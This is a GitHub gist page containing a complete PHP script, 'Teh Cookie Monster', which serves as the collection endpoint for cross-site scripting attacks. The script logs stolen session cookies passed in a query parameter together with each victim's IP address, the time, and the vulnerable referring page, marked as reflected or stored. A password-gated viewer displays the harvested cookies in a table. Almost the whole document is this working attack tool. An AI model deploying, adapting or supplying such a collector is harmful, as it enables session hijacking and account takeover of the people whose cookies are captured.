Instantly share code, notes, and snippets.
Created
August 1, 2021 13:56
-
Star
0
(0)
You must be signed in to star a gist -
Fork
0
(0)
You must be signed in to fork a gist
-
Save mradamdavies/f3d0004120f9aaa8bb644a23a2e1970c to your computer and use it in GitHub Desktop.
Teh Cookie Monster
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* Teh Cookie Monster! | |
| | @mradamdavies | |
| | www.abeontech.com | |
| ==-------------------------*/ | |
| define('LOG_FILE', $_SERVER['DOCUMENT_ROOT']. | |
| '/res/code/cookie-jar.txt'); // Log file location | |
| define('LOGIN_PSWD', '123-derpy_skid-321'); // Password to view cookies | |
| define('BAD_BOY', '<h1>Bugger Off!</h1>'); // Bad boy message | |
| class Cookie_Logger { // Create a basic class | |
| public $mode = ''; // Login = 1 | |
| public $pswd = ''; // Password | |
| public $tehcookie = ''; // Cookie we want! | |
| public $dated = ''; // Date & time logged | |
| public $ip = ''; // Target's IP | |
| public $referer = ''; // Referral information | |
| public $type = ''; // Reflected? 1|0 | |
| /* Let's start */ | |
| function __construct() { | |
| function sec($input) { // Basic input validation. | |
| $input = strip_tags($input); | |
| $input = htmlspecialchars($input, ENT_QUOTES, 'UTF-8'); | |
| $input = trim($input); | |
| return $input; | |
| } | |
| // Update our variables | |
| $this->mode = (isset($_GET['mode'])) ? (int) $_GET['mode'] : ""; | |
| $this->pswd = (isset($_GET['pswd'])) ? sec($_GET['pswd']) : ""; | |
| $this->dated = date("dS F"). | |
| ' ('.date("H:i a"). | |
| ')'; | |
| $this->ip = sec(getenv('REMOTE_ADDR')); | |
| $this->tehcookie = (isset($_GET['c'])) ? sec($_GET['c']) : NULL; | |
| $this->type = (isset($_GET['reflect'])) ? (int) $_GET['reflect'] : "empty"; | |
| $this->referer = sec(getenv('HTTP_REFERER')); | |
| if ($this->type == 0) { | |
| $this->vuln_page = $this->referer; | |
| } else { | |
| $this-> vuln_page = parse_url($this->referer, PHP_URL_SCHEME). | |
| '://'.parse_url($this->referer, PHP_URL_HOST).parse_url($this->referer, PHP_URL_PATH); | |
| } | |
| } // Construction complete. Time for furniture... | |
| function store_info() { // Log all relevant information | |
| $fp = fopen(LOG_FILE, 'a') or die("Error opening file"); | |
| fwrite($fp, "$this->dated,"); // date | |
| fwrite($fp, "$this->ip,"); // ip | |
| fwrite($fp, "$this->tehcookie,"); // cookie | |
| fwrite($fp, "$this->type,"); // reflected 1|0 | |
| fwrite($fp, "$this->vuln_page"); // vulnerable page | |
| fwrite($fp, "\r\n"); | |
| fclose($fp) or die("Error closing file"); | |
| } | |
| public | |
| function __destruct() { // Unset variables | |
| unset($this->redirect_url); | |
| unset($this->mode); | |
| unset($this->pswd); | |
| unset($this->tehcookie); | |
| unset($this->type); | |
| unset($this->dated); | |
| unset($this->ip); | |
| unset($this->referer); | |
| unset($this->vuln_page); | |
| } | |
| } // Class dismissed. Logs chopped and stacked. | |
| /* Instantiate the class */ | |
| $c_log = new Cookie_Logger(); | |
| if ($c_log->mode == 1) { // Display Cookie Viewer? | |
| if ($c_log->pswd == LOGIN_PSWD) { // Password correct? | |
| /* Show logged cookies */ | |
| echo '<h1>Teh Cookie Monster!</h1>'; | |
| $fp = fopen(LOG_FILE, 'r') or die("Error opening file"); | |
| echo "<table style='padding:6px;border:thin dashed #fd5200'>"; | |
| echo '<tr style="text-align:center;font-weight:bold">'; | |
| echo "<td>Date</td> <td> IP </td> <td> Cookie </td> <td> Type <abbr title = 'Reflected = 1 | Stored = 0'> [ ? ] </abbr></td> | |
| <td> Vulnerable page </td> <td> Visit </td>"; | |
| echo "</tr>"; | |
| while ($csv_entry = fgetcsv($fp, 1024)) { // Loop CSV data | |
| echo '<tr onMouseOver="this.bgColor=\'#CCC\'" onMouseOut="this.bgColor=\'#FFF\'" bgColor=#FFF>'; | |
| for ($i = 0, $j = count($csv_entry); $i < $j; ++$i) { | |
| echo '<td style="border-top:thin solid #ccc; padding:0 10px">'.$csv_entry[$i]. | |
| '</td>'; | |
| if ($i == 4) { // View page link | |
| echo '<td style="border-top:thin solid #ccc; padding:0 10px"><a target="_blank" href="http://anonym.to/?'.$csv_entry[$i]. | |
| '" style="text-decoration:none">« View Page</a></td>'; | |
| } | |
| } | |
| echo "</tr>"; | |
| } | |
| if (!isset($i)) { | |
| exit('<tr><td colspan="6" style="text-align:center;">No Cookies... Feed me!</td></tr>'); | |
| } | |
| echo '</table>'; | |
| fclose($fp) or die("Error closing file"); | |
| } else { // Password incorrect | |
| exit(BAD_BOY); | |
| } | |
| } else if ($c_log->mode != 1 && !isset($c_log->tehcookie)) { // Invalid mode or empty cookies | |
| exit(BAD_BOY); | |
| } else { // Eat all teh cookies! | |
| $c_log->store_info(); | |
| exit(); | |
| } ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment